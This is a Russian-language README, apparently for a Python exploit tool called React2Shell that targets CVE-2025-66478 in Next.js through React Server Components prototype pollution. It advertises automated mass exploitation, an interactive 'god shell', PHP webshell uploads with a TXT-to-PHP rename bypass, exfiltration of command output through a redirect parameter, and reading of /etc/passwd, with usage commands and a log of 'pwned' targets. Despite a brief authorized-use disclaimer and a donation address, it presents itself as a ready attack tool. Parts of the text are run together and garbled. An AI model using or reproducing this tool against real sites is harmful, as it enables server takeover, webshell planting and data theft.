
React2Shell - Эксплойт RCE для CVE-2025-66478
Этот инструмент на Python эксплуатирует загрязнение прототипа React Server Components (RSC) в Next.js и цепочку гаджетов React.lazy(-1) для полного доступа RCE, включая интерактивную god shell, загрузку файлов (дроппер PHP-вебшелла) и эксфильтрацию через ?out=.

Автоматизированное обнаружение и эксплуатация уязвимых приложений Next.js (например, target.com). Получает оболочку с uid=33(www-data), включая:
child_process.execSync → /exploit?out=UIDread /etc/passwd), загрузки{\"0\":null} → 500 E{\"digest подтверждает обработчик RSC.Location: /exploit?out=id_outputexecSync(cmd) → эксфильтрация stdout/stderr через перенаправление.upload_txt local.txt remote.php → обход записи+переименования.pip3 install aiohttppython3 main.pyhttp://target.com или targets.txt1=Detect 2=PoC(id) 3=Custom 4=God Shell [4]Piped: echo \"http://target\n4\" | python3 main.py
Команды God Shell:
upload <local.php> <remote/shell.php> # Прямая загрузка PHP
upload_txt <local> <remote/shell.php> # Обход через TXT→переименование
upload_bin <local> <remote> # Бинарные файлы (потом chmod)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[VULNERABLE] → uid=33(www-data)aiohttp
pip install aiohttp
Только для авторизованного пентестинга и образовательных целей (пользователь подтвердил разрешение в соответствии с Условиями использования). Несанкционированное использование незаконно/неэтично.
Купи мне кофе:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans